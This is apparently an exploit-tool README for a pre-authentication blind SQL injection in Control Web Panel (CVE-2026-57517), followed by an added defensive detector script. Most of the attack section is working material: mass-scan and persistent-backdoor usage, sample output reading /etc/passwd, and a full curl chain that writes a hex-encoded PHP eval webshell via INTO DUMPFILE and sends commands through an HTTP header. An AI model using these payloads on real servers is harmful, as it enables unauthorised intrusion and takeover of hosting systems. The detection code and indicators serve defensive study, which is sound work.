## https://sploitus.com/exploit?id=AB794952-8E2E-55F8-97FF-1DE1AB6E3835
# Control Web Panel ≤ 0.9.8.1224 — Blind SQL Injection to Remote Code Execution

Port 2083 → userRes POST → INTO DUMPFILE → Port 2031 Webshell → cwpsvc

---

## 🔴 Vulnerability Overview

**CVE-2026-57517** is a critical pre-authentication blind SQL injection in **Control Web Panel (CWP)** versions ≤ 0.9.8.1224. The `userRes` POST parameter of the user panel endpoint is embedded in an SQL query without sanitization. The query runs as **MySQL root**, which holds the global `FILE` privilege, so an injected `INTO DUMPFILE` clause can write arbitrary files on the server.

The exploitation chain writes a PHP webshell into the web-accessible Roundcube logs directory, yielding remote code execution as the `cwpsvc` service account.

| Field | Detail |
|---|---|
| **CVE** | CVE-2026-57517 |
| **CVSS** | 9.8 (Critical) — `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **Type** | CWE-89 — Blind SQL Injection (Pre-Auth) |
| **Affected** | Control Web Panel ≤ 0.9.8.1224 |
| **Fixed** | Version 0.9.8.1225 |
| **Disclosure** | July 1, 2026 |
| **Researcher** | Egidio Romano (Karma In Security) |
| **PoC** | Public — [KIS-2026-12](https://karmainsecurity.com/KIS-2026-12) |

---

## 📦 Installation

```bash
git clone https://github.com/shinthink/CVE-2026-57517.git
cd CVE-2026-57517
pip install -r requirements.txt
```

---

## 📖 Usage

```bash
# Single target (auto-detect username)
python cve_2026_57517.py -t 192.168.1.100

# Single target with known username
python cve_2026_57517.py -t 192.168.1.100 -u cwpsvc

# Mass scan
python cve_2026_57517.py -f targets.txt -o live.txt

# Interactive shell
python cve_2026_57517.py -t target.com --rce -u cwpsvc

# Persistent backdoor (no auto-cleanup)
python cve_2026_57517.py -t target.com --no-cleanup
```

```
  -t, --target      Single target host
  -f, --file        File with targets (one per line)
  -u, --username    CWP username (skips auto-detection)
  -o, --output      Live TXT output file
  --json            JSON report file
  --threads         Concurrent workers (default: 20)
  --timeout         Request timeout seconds (default: 15)
  --no-cleanup      Leave shells on target
  --rce             Interactive shell mode
  -v, --verbose     Verbose output
```

---

## 🧪 Proof of Concept

### Scenario 1: Mass Scan

```bash
$ python cve_2026_57517.py -f targets.txt -o live.txt -v
```

```
────────────────────────────────────────────────────────────
  CVE-2026-57517 | 5 targets | 20 threads
  Cleanup: yes
  Live TXT: live.txt
────────────────────────────────────────────────────────────

  ✅ 192.168.10.100:2083  [rce_confirmed]  18.2s
     User  : admin
     Shell : https://192.168.10.100:2031/roundcube/logs/cwp_a3f2b9c1d8e4.php
     RCE   : uid=1001(cwpsvc) gid=1001(cwpsvc) groups=1001(cwpsvc)
             cwp-prod-01.example.com
     whoami: cwpsvc

  ⚠️ 192.168.10.200:2083  [sqli_failed]  12.1s
     User  : cwpsvc
     Error : SQL injection failed — target may be patched or path not writable

  · 192.168.10.50:2083  [not_cwp]  2.3s

==================================================
  SCAN SUMMARY
==================================================
  Total      : 5
  ✅ RCE      : 2
  ⚠️  SQLi Fail : 1
  🔍 No User  : 1
  ·  Not CWP  : 1
==================================================
```

### Scenario 2: Interactive Shell

```bash
$ python cve_2026_57517.py -t target.com --rce -u admin
```

```
  CWP Interactive Shell — target.com
  Type 'exit' to quit, 'cleanup' to remove shell

cwp$ id
uid=1001(cwpsvc) gid=1001(cwpsvc) groups=1001(cwpsvc)

cwp$ hostname
cwp-prod-01

cwp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
cwpsvc:x:1001:1001::/home/cwpsvc:/bin/bash

cwp$ exit
```

### Scenario 3: Manual Reproduction (curl)

**Step 1 — Verify CWP is reachable on port 2083**
```bash
curl -sk 'https://target.com:2083/' | grep -i 'control web panel\|CWP'
```

**Step 2 — Validate username**
```bash
curl -sk -o /dev/null -w "%{http_code}" 'https://target.com:2083/admin/'
# 200 = user exists
```

**Step 3 — SQL injection via userRes**

The payload uses a 13-column UNION SELECT with a hex-encoded PHP shell written via `INTO DUMPFILE`:

```sql
" UNION SELECT 1,0x{HEX_PHP_SHELL},3,4,5,6,7,8,9,10,11,12,13
INTO DUMPFILE '/usr/local/cwpsrv/var/services/roundcube/logs/shell.php' #
```

```bash
# The tool handles hex encoding automatically. Manual equivalent:
PAYLOAD='" UNION SELECT 1,0x3c3f706870206576616c286261736536345f6465636f646528245f5345525645525b22485454505f43225d29293b203f3e,3,4,5,6,7,8,9,10,11,12,13 INTO DUMPFILE '\''/usr/local/cwpsrv/var/services/roundcube/logs/shell.php'\'' #'

curl -sk 'https://target.com:2083/admin/' \
  -d "userRes=$PAYLOAD"
```

**Step 4 — Execute commands via webshell (port 2031)**

The deployed PHP shell reads commands from the `C:` HTTP header:

```php
<?php eval(base64_decode($_SERVER["HTTP_C"])); ?>
```

This is the decoded form of the `0x3c3f...` hex literal used in Step 3: it evaluates whatever base64-encoded PHP arrives in the `C` request header.

```bash
# Base64-encode: print '___CMD___'; passthru(base64_decode('aWQ=')); print '___CMD___';
PHP=$(echo "print '___CMD___'; passthru(base64_decode('aWQ=')); print '___CMD___';" | base64 -w0)

curl -sk 'https://target.com:2031/roundcube/logs/shell.php' -H "C: $PHP"
# uid=1001(cwpsvc) gid=1001(cwpsvc)
```

### Payload Breakdown

| Component | Value |
|---|---|
| **SQL columns** | 13-column UNION SELECT |
| **PHP shell** | `<?php eval(base64_decode($_SERVER["HTTP_C"])); ?>` (decoded form of the hex literal in Step 3) |
| **Hex encoding** | MySQL `0x...` hex literal |
| **Write method** | `INTO DUMPFILE` (binary-exact file write) |
| **Target path** | `/usr/local/cwpsrv/var/services/roundcube/logs/{uniqid}.php` |
| **Command delivery** | HTTP header `C:` with base64-encoded PHP |
| **Command executor** | `passthru(base64_decode('{cmd}'))` |
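From the defender's side, the chain summarised in the overview and in the table above leaves distinct traces on both ports: a `userRes` POST on 2083 carrying `UNION SELECT` / `INTO DUMPFILE` and a hex literal that begins with `0x3c3f706870` (`<?php`), then requests on 2031 for a `.php` file under `/roundcube/logs/` with a `C` header. The Python below is an added example, not part of this tool or the advisory; the request-record format and the sample traffic are constructed assumptions.

```python
import os
import re
from urllib.parse import unquote_plus

# Indicators taken from the exploit chain documented on this page.
SQLI_MARKERS = ("UNION SELECT", "INTO DUMPFILE", "INTO OUTFILE")
HEX_PHP_TAG = re.compile(r"0x3c3f706870", re.I)          # hex literal for "<?php"
DUMPFILE_PHP = re.compile(r"INTO DUMPFILE\s+'[^']*\.php'", re.I)
DROP_DIR_RE = re.compile(r"/roundcube/logs/[A-Za-z0-9_]+\.php$")
ROUNDCUBE_LOGS = "/usr/local/cwpsrv/var/services/roundcube/logs"

def classify_request(req):
    """Tag one request record (assumed dict: port, method, path, headers, body); [] means clean."""
    tags = set()
    body = unquote_plus(req.get("body", ""))
    path = req["path"].split("?", 1)[0]          # ignore any query string
    # Stage 1: blind SQLi through userRes on the user-panel port (2083)
    if req["port"] == 2083 and req["method"] == "POST" and "userRes=" in body:
        if any(m in body.upper() for m in SQLI_MARKERS):
            tags.add("sqli_userRes")
        if HEX_PHP_TAG.search(body):
            tags.add("hex_php_payload")
        if DUMPFILE_PHP.search(body):
            tags.add("dumpfile_php_write")
    # Stage 2: dropped file requested from the Roundcube logs directory (2031)
    if req["port"] == 2031 and DROP_DIR_RE.search(path):
        tags.add("webshell_path")
        if any(h.lower() == "c" for h in req.get("headers", {})):
            tags.add("webshell_c_header")      # command is delivered in the "C" header
    return sorted(tags)

def find_dropped_php(logs_dir=ROUNDCUBE_LOGS):
    """A log directory should never hold PHP: list any .php files found there."""
    try:
        return sorted(e.name for e in os.scandir(logs_dir) if e.name.lower().endswith(".php"))
    except FileNotFoundError:
        return []

# Constructed sample traffic; the hex literal decodes to a harmless "<?php /*...*/ ?>".
SAMPLES = [
    {"port": 2083, "method": "POST", "path": "/admin/", "headers": {},
     "body": "userRes=%22+UNION+SELECT+1%2C0x3c3f706870202f2a2e2e2e2a2f203f3e%2C3%2C4%2C5"
             "%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13+INTO+DUMPFILE+%27" + ROUNDCUBE_LOGS + "/x.php%27+%23"},
    {"port": 2031, "method": "GET", "path": "/roundcube/logs/cwp_a3f2b9c1d8e4.php",
     "headers": {"C": "<base64-php-placeholder>"}, "body": ""},
    {"port": 2083, "method": "POST", "path": "/admin/", "headers": {}, "body": "userRes=alice&pass=x"},
]

if __name__ == "__main__":
    for r in SAMPLES:
        print(r["port"], r["path"], classify_request(r) or "clean")
```

Run `find_dropped_php()` on the CWP host itself; any `.php` name it returns in the Roundcube logs directory warrants an incident response, not just deletion.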

---

## โš ๏ธ Disclaimer

> ### ๐Ÿšจ FOR EDUCATIONAL & AUTHORIZED TESTING PURPOSES ONLY
>
> This software is provided **solely for educational purposes** and **legitimate security research**. It is intended to be used by:
>
> - 🛡️ **Security professionals** conducting authorized penetration tests
> - 🏢 **Organizations** auditing their own CWP infrastructure
> - 🔬 **Researchers** studying vulnerability exploitation techniques
> - 🎓 **Students** learning about web application security
>
> ### ❌ You may NOT use this software to:
>
> - Access computer systems **without explicit written authorization**
> - Compromise, damage, or disrupt systems you do not **own**
> - Engage in **illegal activity** of any kind
>
> ### โš–๏ธ Legal Notice
>
> Unauthorized access to computer systems violates laws including but not limited to:
> - **United States:** Computer Fraud and Abuse Act (18 U.S.C. ยง 1030)
> - **Indonesia:** UU ITE Pasal 30 & 46 (UU No. 11 Tahun 2008 jo. UU No. 1 Tahun 2024)
> - **European Union:** Directive 2013/40/EU
> - **United Kingdom:** Computer Misuse Act 1990
>
> **The author(s) assume NO LIABILITY for any misuse, damage, or legal consequences resulting from the use of this tool. By using this software, you acknowledge that you are solely responsible for your actions and agree to comply with all applicable laws.**

---

## 📚 References

| Resource | Link |
|---|---|
| Karma In Security Advisory | [KIS-2026-12](https://karmainsecurity.com/KIS-2026-12) |
| Original PoC | [CVE-2026-57517.php](https://karmainsecurity.com/pocs/CVE-2026-57517.php) |
| Full Disclosure | [SecLists](https://seclists.org/fulldisclosure/2026/Jul/9) |
| OpenCVE | [CVE-2026-57517](https://app.opencve.io/cve/CVE-2026-57517) |
| CWP Changelog | [control-webpanel.com](https://control-webpanel.com/changelog) |

---

⚡ Built for security research & education ⚡

This project is not affiliated with Control Web Panel or the Apache Software Foundation.